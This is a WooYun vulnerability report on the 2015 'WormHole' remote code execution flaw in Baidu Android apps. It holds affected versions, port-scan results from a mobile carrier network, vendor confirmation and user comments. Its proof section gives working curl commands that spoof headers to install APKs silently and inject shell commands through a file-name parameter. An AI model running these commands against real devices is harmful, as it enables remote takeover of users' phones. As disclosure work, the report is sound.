当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148406

漏洞标题:WormHole虫洞漏洞总结报告(附检测结果与测试脚本)

相关厂商:百度

漏洞作者: 瘦蛟舞

提交时间:2015-10-21 17:46

修复时间:2016-01-19 18:40

公开时间:2016-01-19 18:40

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

wormhole

详细说明:

###已知受影响应用以及版本
---

百度输入法  检测版本5.8.2.0
百度音乐 检测版本5.6.5.0
百度地图 检测版本8.7
百度手机助手 检测版本6.6.0
百度浏览器 检测版本6.1.13.0
手机百度 检测版本6.9
hao123 检测版本6.1
百度贴吧 检测版本6.9.2
百度云 检测版本7.8 (7.10 fixed)
百度视频 检测版本7.18.1
安卓市场 检测版本6.0.86
百度新闻 检测版本5.4.0.0
爱奇艺 检测版本6.0 (6.7 fixed)


WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标)
WooYun: 百度手机助手远程静默安装启动应用漏洞(3G/4G环境下远程种马)
WooYun: 百度系应用安卓版远程代码执行漏洞(百度地图/输入法为例)
对前面的漏洞总结,以及一些跟进情况.
###漏洞危害
---
1.该漏洞利用方法并不复杂,知道原理后即可轻松发起攻击
2.利用条件也不苛刻,只要是手机在联网状态都有可能受到攻击,无论是 wifi 无线网络或者3G/4G 蜂窝网络
3.此漏洞不受系统版本影响,在最新 android6.0上测试成功.
4.漏洞可以达到如下攻击效果
- 远程执行任意代码(可以达到 root 权限)
- 远程静默安装应用
- 远程启动任意应用
- 远程静默添加联系人
- 远程获取坐标位置信息/获取imei信息/获取应用安装信息
- 远程读取写入文件
###对蜂窝(3G/4G)网络检测结果
---
4G网络的 UE 检测 apn 结果如下

123 && 123({"apn":"ctlte","subtype":"lte","error":0});


对4G 网络两个 C 段的40310/6259端口进行探测并且使用getserviceinfo判断其漏洞 app.(并没做其他攻击,测试发现3G 的 UE 与4G 的 UE 是互通的,运营商内网极其庞大)

Discovered open port 40310/tcp on 10.142.2.189 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.14 com.baidu.BaiduMap
Discovered open port 40310/tcp on 10.142.2.66 com.baidu.searchbox_huawei (华为手机预装)
Discovered open port 40310/tcp on 10.142.2.221 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.52 com.baidu.netdisk
Discovered open port 40310/tcp on 10.142.2.144 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.204 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.60 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.16 "com.baidu.tieba"
---
Discovered open port 6259/tcp on 10.142.2.25 com.baidu.searchbox_huawei
Discovered open port 6259/tcp on 10.142.2.65 com.baidu.BaiduMap
Discovered open port 6259/tcp on 10.142.2.204 com.hiapk.marketpho
Discovered open port 6259/tcp on 10.142.2.16 com.baidu.input
Discovered open port 6259/tcp on 10.142.2.151 com.baidu.BaiduMap
---
Discovered open port 6259/tcp on 10.142.3.25 "packagename":"com.baidu.searchbox","version":"19"
Discovered open port 6259/tcp on 10.142.3.93 "packagename":"com.baidu.appsearch"
Discovered open port 6259/tcp on 10.142.3.135 "com.hiapk.marketpho","version":"121"
Discovered open port 6259/tcp on 10.142.3.163 "packagename":"com.hiapk.marketpho"
Discovered open port 6259/tcp on 10.142.3.117 "com.baidu.browser.apps","version":"121"
Discovered open port 6259/tcp on 10.142.3.43 "com.qiyi.video","version":"20"
Discovered open port 6259/tcp on 10.142.3.148 "com.baidu.appsearch","version":"121"
Discovered open port 6259/tcp on 10.142.3.196 "com.baidu.input","version":"16"
Discovered open port 6259/tcp on 10.142.3.204 "com.baidu.BaiduMap","version":"20"
Discovered open port 6259/tcp on 10.142.3.145 "com.baidu.appsearch","version":"121"
Discovered open port 6259/tcp on 10.142.3.188 "com.hiapk.marketpho","version":"21"
---
Discovered open port 40310/tcp on 10.142.3.53 "com.baidu.BaiduMap","version":"122"
Discovered open port 40310/tcp on 10.142.3.162 "com.ting.mp3.android","version":"122"
Discovered open port 40310/tcp on 10.142.3.139 "com.baidu.searchbox","version":"122"
Discovered open port 40310/tcp on 10.142.3.143 "com.baidu.BaiduMap","version":"122"
Discovered open port 40310/tcp on 10.142.3.45 file not found (netdisk fixed version)
Discovered open port 40310/tcp on 10.142.3.176 "packagename":"com.baidu.searchbox"

漏洞证明:

###远程执行 root 命令

curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.1.102:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk


已经有了远程静默安装的 poc,因为是带入 exec 方法,并且使用拼接的方式,那么就考虑考虑截断远程执行命令了.

curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.1.102:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk\'\;\'whoami


root.jpg


附带一个更有意思的 exp,替换百度浏览器为 UC 浏览器
如果用户没有 root 权限,可以使用如下 poc提示协助.

curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.1.102:40310/sendintent?callback=123&mcmdf=inapp_xxx&intent=intent%3Apackage%3Acom.baidu.browser.apps%23Intent%3Baction%3Dandroid.intent.action.DELETE%3Bend


uninstall.png


如果 root 了那就可以静默完成这些了...

curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.1.102:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk\'\;pm%20uninstall%20\'com.baidu.browser.apps


uc.png


本意是协助百度尽快修复漏洞,所以提供了一个检测脚本在测试代码中.

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-21 18:30

厂商回复:

感谢您对百度安全你的关注,此漏洞已知晓且mo + sdk已修复

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-21 17:52 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:900 漏洞数:105 )

    前排!

  2. 2015-10-21 17:54 | 故滨 ( 普通白帽子 | Rank:291 漏洞数:40 )

    这个不应该是cncert吗,怎么变成百度了

  3. 2015-10-21 19:08 | Mark0smith ( 实习白帽子 | Rank:99 漏洞数:36 )

    wow

  4. 2015-10-28 12:39 | 蚕豆网(乌云厂商)

    速度真快

  5. 2015-10-28 13:57 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    这个要打雷 给$ 置顶阿。。 用户超亿了

  6. 2015-10-28 19:28 | zzzmode ( 路人 | Rank:7 漏洞数:2 | )

    libBdMoplusMD5_V1.so 出问题了?

  7. 2015-10-29 02:36 | 麻辣烫 ( 路人 | Rank:27 漏洞数:10 | wooyun是一个学习的好地方.)

    http://zone.wooyun.org/content/23346

  8. 2015-10-29 11:25 | 小杰哥 ( 普通白帽子 | Rank:183 漏洞数:29 | 逆水行舟,不进则退。)

    @xsser_w 你暴露了 两个都是你发的?

  9. 2015-10-29 17:35 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    @小杰哥 不是阿 是路人甲发的

  10. 2015-10-29 18:36 | liutao0532 ( 路人 | Rank:6 漏洞数:7 | b.b.b)

    百度全家桶现已加入豪华午餐